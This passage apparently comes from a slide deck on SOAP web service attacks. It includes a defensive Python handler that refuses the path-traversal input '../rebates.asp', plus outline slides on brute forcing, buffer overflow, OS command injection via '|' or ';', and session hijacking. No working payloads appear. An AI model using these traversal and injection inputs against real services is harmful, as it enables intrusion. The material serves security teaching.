              </getRebatesInfoResponse>
            </soap:Body>
          </soap:Envelope>
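    An added example (not code from the presentation) covering both the AV 2 fault-code leak and the AV 7 file access above: a hardened getRebatesInfo handler that confines the fileinfo parameter to one rebates directory, so ../rebates.asp is refused before any file is opened, and answers every failure with a generic soap:Fault while the real reason and internal path go only to a server-side log. The directory layout, file names and contents are constructed fixtures.

```python
"""Hardened getRebatesInfo handler: no path traversal, no fault-code leakage.

Added example, not code from the presentation. It implements the two controls
the AV 2 and AV 7 slides argue for: fileinfo is confined to a single rebates
directory (../rebates.asp is refused before any file is touched) and every
failure is answered with a generic soap:Fault, while the real reason and the
internal path go only to the server-side log. The directory layout and file
contents are constructed fixtures.
"""
import os
import tempfile
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVER_LOG = []     # stand-in for the server's log sink


def soap_fault(client_message, detail):
    """Fault envelope carrying only a generic message; detail is logged, not sent."""
    SERVER_LOG.append(detail)
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="%s"><soap:Body><soap:Fault>'
            '<faultcode>soap:Server</faultcode><faultstring>%s</faultstring>'
            '<detail /></soap:Fault></soap:Body></soap:Envelope>'
            % (SOAP_NS, escape(client_message)))


def rebates_response(content):
    """Success envelope in the shape the slides show for getRebatesInfo."""
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="%s"><soap:Body>'
            '<getRebatesInfoResponse xmlns="http://tempuri.org/">'
            '<getRebatesInfoResult>%s</getRebatesInfoResult>'
            '</getRebatesInfoResponse></soap:Body></soap:Envelope>'
            % (SOAP_NS, escape(content)))


def resolve_rebate_file(base_dir, fileinfo):
    """Absolute path of the rebate file, or None unless fileinfo is a plain name in base_dir."""
    # A rebate reference is a bare file name: no separators, no drive letters.
    if not fileinfo or os.path.basename(fileinfo) != fileinfo or ":" in fileinfo \
            or "\\" in fileinfo or "/" in fileinfo:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, fileinfo))
    # Defence in depth: the resolved path must still sit below base_dir.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def handle_get_rebates_info(base_dir, fileinfo):
    """Service the call and return (status, soap_xml); status is 'ok' or 'fault'."""
    path = resolve_rebate_file(base_dir, fileinfo)
    if path is None:
        return "fault", soap_fault("Invalid request.", "rejected fileinfo %r" % fileinfo)
    try:
        with open(path, "r", encoding="utf-8") as fh:
            content = fh.read()
    except OSError as exc:
        return "fault", soap_fault("Requested rebate is not available.",
                                   "could not open %s: %s" % (path, exc))
    return "ok", rebates_response(content)


def make_demo_tree():
    """Constructed fixture: <tmp>/ws/rebates/coupon.txt and <tmp>/ws/rebates.asp."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "ws", "rebates")
    os.makedirs(base)
    with open(os.path.join(base, "coupon.txt"), "w", encoding="utf-8") as fh:
        fh.write("10% off")
    with open(os.path.join(root, "ws", "rebates.asp"), "w", encoding="utf-8") as fh:
        fh.write("<% ' file: rebates.asp %>")
    return base


if __name__ == "__main__":
    base = make_demo_tree()
    for name in ("coupon.txt", "abx.xyz", "../rebates.asp"):
        print(name, "->", handle_get_rebates_info(base, name))
    print("server log:", SERVER_LOG)
```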
    • AV 7 – SOAP brute forcing
      – The SOAP envelope takes user & pass accounts.
      – It is possible to brute force the SOAP envelope and look for specific responses.
      – This is a possible attack which can get into the system.
      – Analyzing the SOAP response is key for this set of attacks.
      – DEMO
    • AV 8 – Parameter overflow
      – Adding large buffers to XML nodes
      – Depending on code controls – it may fail in handling
      – Breaking the application
      – May compromise as well
      – Traditional buffer overflow type attacks
      – DEMO
    • AV 9 – Operating System access
      – Point to the OS
      – Remote command execution is possible
      – Either by "|" or ";"
      – The attack is very much possible
      – Leads to admin/root on the box…
      – DEMO
    • AV 10 – Session hijacking
      – Web services can maintain sessions
        – [WebMethod(EnableSession=true)]
      – Possible to reverse engineer the session
      – Cookie tampering is a reality…
      – Can be compared to traditional web application sessions.
      – DEMO
    • Other attacks
      – External referencing – XML schema
      – XSS attack
      – In transit attacks – replay and spoofing